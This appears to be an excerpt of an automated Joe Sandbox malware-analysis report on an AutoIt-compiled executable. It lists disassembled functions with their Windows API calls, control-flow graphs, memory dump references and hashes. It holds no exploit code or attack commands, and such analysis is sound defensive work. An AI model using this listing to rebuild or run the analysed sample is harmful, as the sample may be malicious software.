                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 88deb708b06e705a47864dd868acc9120d0c56a23c3332b8ed8253bc0ac99f1d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: dfbe216e3a357d84493d9185cfa6ad50f2ba126a37d0f174909462ec70b62b93
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88deb708b06e705a47864dd868acc9120d0c56a23c3332b8ed8253bc0ac99f1d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6231A27102C349ABC701EF60D8958AFB7E9BEA5304F404D1EF4D282291EB60DA19CB53
                                                                                                                                                                                                                                                                                                                            Function 0023DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0023DDAC
                                                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0023DDBA
                                                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0023DDDA
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0023DE87
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 736c985c0c6847aafa976087f9ae5512a812fcbe89d1b594175a9daac8eafd7b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ab80ccfcff7ab32e0135016eeb2ffda71840defbe4d7775f871cbe42890ac8ea
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 736c985c0c6847aafa976087f9ae5512a812fcbe89d1b594175a9daac8eafd7b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A331B671108301DFD711EF50DC85AAFBBE8AFA9344F14092EF586872A1EB71D945CB92
                                                                                                                                                                                                                                                                                                                            Function 001EAC3E Relevance: 37.4, APIs: 1, Strings: 20, Instructions: 671COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 0 1eac3e-1eb063 call 1d8ec0 call 1ebc58 call 1de6a0 7 228584-228591 0->7 8 1eb069-1eb073 0->8 11 228593 7->11 12 228596-2285a5 7->12 9 1eb079-1eb07e 8->9 10 22896b-228979 8->10 13 2285b2-2285b4 9->13 14 1eb084-1eb090 call 1eb5b6 9->14 17 22897b 10->17 18 22897e 10->18 11->12 15 2285a7 12->15 16 2285aa 12->16 22 2285bd 13->22 14->22 25 1eb096-1eb0a3 call 1dc98d 14->25 15->16 16->13 17->18 20 228985-22898e 18->20 23 228993 20->23 24 228990 20->24 26 2285c7 22->26 27 22899c-2289eb call 1de6a0 call 1ebbbe * 2 23->27 24->23 33 1eb0ab-1eb0b4 25->33 31 2285cf-2285d2 26->31 63 2289f1-228a03 call 1eb5b6 27->63 64 1eb1e0-1eb1f5 27->64 34 1eb158-1eb16f 31->34 35 2285d8-228600 call 1f4cd3 call 1d7ad5 31->35 37 1eb0b8-1eb0d6 call 1f4d98 33->37 40 228954-228957 34->40 41 1eb175 34->41 76 228602-228606 35->76 77 22862d-228651 call 1d7b1a call 1dbd98 35->77 56 1eb0d8-1eb0e1 37->56 57 1eb0e5 37->57 45 228a41-228a79 call 1de6a0 call 1ebbbe 40->45 46 22895d-228960 40->46 47 1eb17b-1eb17e 41->47 48 2288ff-228920 call 1de6a0 41->48 45->64 106 228a7f-228a91 call 1eb5b6 45->106 46->27 53 228962-228965 46->53 54 1eb184-1eb187 47->54 55 228729-228743 call 1ebbbe 47->55 48->64 69 228926-228938 call 1eb5b6 48->69 53->10 53->64 65 1eb18d-1eb190 54->65 66 2286ca-2286e0 call 1d6c03 54->66 85 228749-22874c 55->85 86 22888f-2288b5 call 1de6a0 55->86 56->37 67 1eb0e3 56->67 57->26 59 1eb0eb-1eb0fc 57->59 59->10 70 1eb102-1eb11c 59->70 97 228a05-228a0d 63->97 98 228a2f-228a3c call 1dc98d 63->98 71 1eb1fb-1eb20b call 1de6a0 64->71 72 228ac9-228acf 64->72 79 228656-228659 65->79 80 1eb196-1eb1b8 call 1de6a0 65->80 66->64 95 2286e6-2286fc call 1eb5b6 66->95 67->59 117 228945 69->117 118 22893a-228943 call 1dc98d 69->118 70->31 82 1eb122-1eb154 call 1ebbbe call 1de6a0 70->82 72->33 88 228ad5 72->88 76->77 90 228608-22862b call 1dad40 76->90 77->79 79->10 83 22865f-228674 call 1d6c03 79->83 80->64 114 1eb1ba-1eb1cc call 1eb5b6 80->114 82->34 83->64 136 22867a-228690 call 1eb5b6 83->136 104 22874e-228751 85->104 105 2287bf-2287de call 1de6a0 85->105 86->64 139 2288bb-2288cd call 1eb5b6 86->139 88->10 90->76 90->77 143 2286fe-22870b call 1d8ec0 95->143 144 22870d-228716 call 1d8ec0 95->144 112 228a1e-228a29 call 1db4b1 97->112 113 228a0f-228a13 97->113 150 228ac2-228ac4 98->150 120 228757-228774 call 1de6a0 104->120 121 228ada-228ae8 104->121 105->64 142 2287e4-2287f6 call 1eb5b6 105->142 154 228a93-228a9b 106->154 155 228ab5-228abe call 1dc98d 106->155 112->98 161 228b0b-228b19 112->161 113->112 129 228a15-228a19 113->129 162 2286ba-2286c3 call 1dc98d 114->162 163 1eb1d2-1eb1de 114->163 135 228949-22894f 117->135 118->135 120->64 165 22877a-22878c call 1eb5b6 120->165 127 228aea 121->127 128 228aed-228afd 121->128 127->128 145 228b02-228b06 128->145 146 228aff 128->146 147 228aa1-228aa3 129->147 135->64 178 228692-22869b call 1dc98d 136->178 179 22869d-2286ab call 1d8ec0 136->179 169 2288de 139->169 170 2288cf-2288dc call 1dc98d 139->170 142->64 185 2287fc-228805 call 1eb5b6 142->185 186 228719-228724 call 1d8577 143->186 144->186 145->71 146->145 147->64 150->64 166 228aa8-228ab3 call 1db4b1 154->166 167 228a9d 154->167 155->150 175 228b1b 161->175 176 228b1e-228b21 161->176 162->66 163->64 197 22878e-22879d call 1dc98d 165->197 198 22879f 165->198 166->155 166->161 167->147 184 2288e2-2288e9 169->184 170->184 175->176 176->20 199 2286ae-2286b5 178->199 179->199 191 2288f5 call 1d3907 184->191 192 2288eb-2288f0 call 1d396b 184->192 210 228807-228816 call 1dc98d 185->210 211 228818 185->211 186->64 209 2288fa 191->209 192->64 201 2287a3-2287ae call 1f9334 197->201 198->201 199->64 201->10 215 2287b4-2287ba 201->215 209->64 214 22881c-22883f 210->214 211->214 217 228841-228848 214->217 218 22884d-228850 214->218 215->64 217->218 219 228852-22885b 218->219 220 228860-228863 218->220 219->220 221 228873-228876 220->221 222 228865-22886e 220->222 221->64 223 22887c-22888a 221->223 222->221 223->64
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: 4&$@&$P&$`**$`&$d0b$d10m0$d1b$d1r0,2$d5m0$e#*$i$t&$t&$(*$(*$(*$(*$&$&
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-3573905116
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3356dca6d417c025fcab5af5471cb4de0a2430fb679de4eff82b06821b72a8b7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d2aa88f41392824ed73cf6ca0bb95e7c22413c0bc79e209580c4755b88d0399c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3356dca6d417c025fcab5af5471cb4de0a2430fb679de4eff82b06821b72a8b7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB626970619386DFC728DF15D084AAABBE0FF99304F10895EE4898B351DB71E959CF82
                                                                                                                                                                                                                                                                                                                            Function 001D370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 355 1d370f-1d3724 356 1d3784-1d3786 355->356 357 1d3726-1d3729 355->357 356->357 358 1d3788 356->358 359 1d372b-1d3732 357->359 360 1d378a 357->360 361 1d376f-1d3777 DefWindowProcW 358->361 364 1d3738-1d373d 359->364 365 1d3804-1d380c PostQuitMessage 359->365 362 213df4-213e1c call 1d2f92 call 1ef23c 360->362 363 1d3790-1d3795 360->363 366 1d377d-1d3783 361->366 398 213e21-213e28 362->398 368 1d37bc-1d37e3 SetTimer RegisterWindowMessageW 363->368 369 1d3797-1d379a 363->369 370 213e61-213e75 call 23c8f7 364->370 371 1d3743-1d3747 364->371 367 1d37b8-1d37ba 365->367 367->366 368->367 376 1d37e5-1d37f0 CreatePopupMenu 368->376 374 213d95-213d98 369->374 375 1d37a0-1d37b3 KillTimer call 1d3907 call 1d59ff 369->375 370->367 390 213e7b 370->390 377 1d374d-1d3752 371->377 378 1d380e-1d3818 call 1efcad 371->378 383 213dd0-213def MoveWindow 374->383 384 213d9a-213d9e 374->384 375->367 376->367 386 1d3758-1d375d 377->386 387 213e46-213e4d 377->387 392 1d381d 378->392 383->367 393 213da0-213da3 384->393 394 213dbf-213dcb SetFocus 384->394 388 1d3763-1d3769 386->388 389 1d37f2-1d3802 call 1d381f 386->389 387->361 396 213e53-213e5c call 231423 387->396 388->361 388->398 389->367 390->361 392->367 393->388 399 213da9-213dba call 1d2f92 393->399 394->367 396->361 398->361 403 213e2e-213e41 call 1d3907 call 1d396b 398->403 399->367 403->361
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,001D3709,?,?), ref: 001D3777
                                                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,001D3709,?,?), ref: 001D37A3
                                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001D37C6
                                                                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,001D3709,?,?), ref: 001D37D1
                                                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 001D37E5
                                                                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 001D3806
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                                            • String ID: 0$*$0$*$TaskbarCreated
                                                                                                                                                                                                                                                                                                                            • API String ID: 129472671-478030667
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5ea0ec30c2f23a0a225b9a4d93026b868270d266d0e84e246e4a51e432e7b73e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a8949b8af7649357e0b2ec3b0fd43345a7b66e422f5cb284e343590c4bc45aeb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ea0ec30c2f23a0a225b9a4d93026b868270d266d0e84e246e4a51e432e7b73e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C4104F1610645FBDB1D6B2CAC4DBBA3AA5EB16300F144126F62185390CFB49B58D663
                                                                                                                                                                                                                                                                                                                            Function 001D3624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 001D3657
                                                                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 001D3681
                                                                                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001D3692
                                                                                                                                                                                                                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 001D36AF
                                                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001D36BF
                                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A9), ref: 001D36D5
                                                                                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001D36E4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ec3d225780081160430d5d003ebfb159145cda894d9a26686228b7e44f050052
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 936f1b8dd63c9813dc8485dd10edd177565b6de442c711871983513fd2f4049a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec3d225780081160430d5d003ebfb159145cda894d9a26686228b7e44f050052
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1621B4B5E11219EFDB009F98E989B9EBBB4FB09710F10811AF911A62A0DBB545448F91
                                                                                                                                                                                                                                                                                                                            Function 002109DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 412 2109db-210a0b call 2107af 415 210a26-210a32 call 205594 412->415 416 210a0d-210a18 call 1ff636 412->416 421 210a34-210a49 call 1ff636 call 1ff649 415->421 422 210a4b-210a94 call 21071a 415->422 423 210a1a-210a21 call 1ff649 416->423 421->423 431 210b01-210b0a GetFileType 422->431 432 210a96-210a9f 422->432 433 210cfd-210d03 423->433 434 210b53-210b56 431->434 435 210b0c-210b3d GetLastError call 1ff613 CloseHandle 431->435 437 210aa1-210aa5 432->437 438 210ad6-210afc GetLastError call 1ff613 432->438 440 210b58-210b5d 434->440 441 210b5f-210b65 434->441 435->423 449 210b43-210b4e call 1ff649 435->449 437->438 442 210aa7-210ad4 call 21071a 437->442 438->423 445 210b69-210bb7 call 2054dd 440->445 441->445 446 210b67 441->446 442->431 442->438 455 210bc7-210beb call 2104cd 445->455 456 210bb9-210bc5 call 21092b 445->456 446->445 449->423 462 210bed 455->462 463 210bfe-210c41 455->463 456->455 461 210bef-210bf9 call 208a2e 456->461 461->433 462->461 465 210c43-210c47 463->465 466 210c62-210c70 463->466 465->466 468 210c49-210c5d 465->468 469 210c76-210c7a 466->469 470 210cfb 466->470 468->466 469->470 471 210c7c-210caf CloseHandle call 21071a 469->471 470->433 474 210cb1-210cdd GetLastError call 1ff613 call 2056a6 471->474 475 210ce3-210cf7 471->475 474->475 475->470
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0021071A: CreateFileW.KERNEL32(00000000,00000000,?,00210A84,?,?,00000000,?,00210A84,00000000,0000000C), ref: 00210737
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00210AEF
                                                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00210AF6
                                                                                                                                                                                                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00210B02
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00210B0C
                                                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00210B15
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00210B35
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00210C7F
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00210CB1
                                                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00210CB8
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                                                            • String ID: H
                                                                                                                                                                                                                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 7d2148c1b24c3ef98bcefbe55023434e6d3fa1ceacd824f83c80dad21523815f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 93148d781e12b6fbf9863f4a2393b28a1a5a17f95bdd8d73b6b236abd817c5cf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d2148c1b24c3ef98bcefbe55023434e6d3fa1ceacd824f83c80dad21523815f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EA12532A242598FCF18AF68D895BED7BE0AF16324F140159F811DB2D1CBB18DA2CB51
                                                                                                                                                                                                                                                                                                                            Function 001D52A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00214B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 001D55B2
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001D525A
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001D53C4
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00214BFD
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00214C3E
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00214C80
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00214CE7
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00214CF6
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                                                            • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                                                            • Opcode ID: affb2945d14b12f7fba1c6a2f1d6107f97b6c8b57635afdc1d7c0b6b19114203
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c3d7dc96eff5a609d649542546029334a0fb226fa30101609ca6697428db5f15
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: affb2945d14b12f7fba1c6a2f1d6107f97b6c8b57635afdc1d7c0b6b19114203
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5171BF71519305AFCB00EF65EC859AABBE8FF6A340F50042EF045C7260DF719A98CB91
                                                                                                                                                                                                                                                                                                                            Function 001D34D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 001D34DE
                                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 001D34ED
                                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 001D3503
                                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A4), ref: 001D3515
                                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(000000A2), ref: 001D3527
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001D353F
                                                                                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(?), ref: 001D3590
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3624: GetSysColorBrush.USER32(0000000F), ref: 001D3657
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3624: RegisterClassExW.USER32(00000030), ref: 001D3681
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001D3692
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3624: InitCommonControlsEx.COMCTL32(?), ref: 001D36AF
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001D36BF
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3624: LoadIconW.USER32(000000A9), ref: 001D36D5
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001D36E4
